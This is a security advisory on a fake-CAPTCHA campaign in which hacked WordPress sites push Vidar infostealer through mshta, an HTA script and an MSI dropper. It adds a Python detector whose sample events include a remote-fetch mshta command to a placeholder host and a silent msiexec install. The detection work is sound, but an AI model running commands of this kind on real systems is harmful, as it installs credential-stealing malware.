Fake CAPTCHA Campaign on Compromised WordPress Sites Delivers Vidar Infostealer to Windows Users
What Happened — Researchers observed a multi‑stage campaign that compromises WordPress sites, injects a fake Cloudflare‑style CAPTCHA page, and tricks visitors into executing a malicious mshta command. The command launches an obfuscated HTA script that drops a malicious MSI installer, which installs the Vidar infostealer on Windows machines.
Why It Matters for TPRM —
- The attack leverages legitimate Windows binaries, making detection difficult for standard endpoint controls.
- Vidar harvests browser credentials, crypto wallets, payment data, and other sensitive files, exposing third‑party data stored on employee workstations.
- Compromised vendor‑hosted web properties can become a delivery vector for downstream partners and customers.
Who Is Affected —
- All industries that rely on WordPress‑based web properties (media, e‑commerce, professional services, etc.).
- Organizations whose employees browse the internet from corporate devices without strict web‑filtering.
Recommended Actions —
- Review any third‑party WordPress sites or SaaS portals used by your organization for signs of compromise.
- Enforce strict execution policies that block mshta and unsigned MSI installers from internet sources.
- Deploy behavior‑based endpoint detection and response (EDR) to flag hidden window manipulation and rapid MSI drops.
Technical Notes —
- Attack vector: Social engineering via fake CAPTCHA (phishing) → mshta → HTA script → MSI dropper → Vidar infostealer.
- Key techniques: Use of legitimate Windows binaries (mshta), off‑screen window resizing, XOR‑encoded strings, AV‑evasion checks via WMI, and size‑validation of the MSI (>100 KB).
- Data collected: Browser passwords, crypto wallet seeds, session cookies, autofill/payment info, and arbitrary files.
- Observed geography of compromised sites: Italy, France, United States, United Kingdom, Brazil.
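Added example (not from the Malwarebytes report or this advisory): the behavior-based check the EDR recommendation asks for, applied to the mshta → HTA → MSI chain in the Technical Notes. It runs over constructed Sysmon-style process-creation records; the field names, PIDs, file paths and URL are assumptions made for the sample, not observed indicators.

```python
"""Flag the fake-CAPTCHA chain: mshta invoked with a remote HTA source, then an MSI
installer spawned by that mshta process. Input is constructed telemetry, not real logs."""
import re
from typing import Dict, List, Tuple

# Constructed sample process-creation records (Sysmon-style field names are an assumption).
SAMPLE_EVENTS: List[Dict] = [
    {"pid": 4100, "ppid": 880, "image": r"C:\Windows\explorer.exe",
     "cmd": "explorer.exe"},
    # Benign: mshta running a locally installed HTA (must not fire).
    {"pid": 4312, "ppid": 4100, "image": r"C:\Windows\System32\mshta.exe",
     "cmd": r'mshta.exe "C:\Program Files\Vendor\help.hta"'},
    # Suspicious: mshta pulling its HTA from a remote URL (placeholder domain).
    {"pid": 5120, "ppid": 4100, "image": r"C:\Windows\System32\mshta.exe",
     "cmd": "mshta https://placeholder.invalid/verify"},
    # Suspicious: msiexec spawned by that mshta process (HTA -> MSI dropper step).
    {"pid": 5188, "ppid": 5120, "image": r"C:\Windows\System32\msiexec.exe",
     "cmd": r"msiexec /i C:\Users\u\AppData\Local\Temp\setup.msi /qn"},
]

REMOTE_SOURCE = re.compile(r"https?://|\\\\", re.IGNORECASE)  # URL or UNC path


def image_is(event: Dict, name: str) -> bool:
    """True if the process image file name matches (case-insensitive)."""
    return event["image"].lower().rsplit("\\", 1)[-1] == name


def flag_events(events: List[Dict]) -> List[Tuple[int, str]]:
    """Return (pid, reason) for each record matching a step of the chain."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        # Step 1: mshta launched with a remote HTA source (what the fake CAPTCHA makes the user run).
        if image_is(e, "mshta.exe") and REMOTE_SOURCE.search(e["cmd"]):
            findings.append((e["pid"], "mshta launched with a remote HTA source"))
        # Step 2: MSI installer started by an mshta parent (the dropper stage).
        parent = by_pid.get(e["ppid"])
        if parent and image_is(parent, "mshta.exe") and image_is(e, "msiexec.exe"):
            findings.append((e["pid"], "msiexec spawned by mshta (HTA -> MSI dropper)"))
    return findings


if __name__ == "__main__":
    for pid, reason in flag_events(SAMPLE_EVENTS):
        print(f"pid {pid}: {reason}")
```

The local-HTA record is there to show the URL/UNC test separating everyday mshta use from the remote-source pattern; the parent-child test does not depend on the command line at all.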
Source: Malwarebytes Labs – Hacked sites deliver Vidar infostealer to Windows users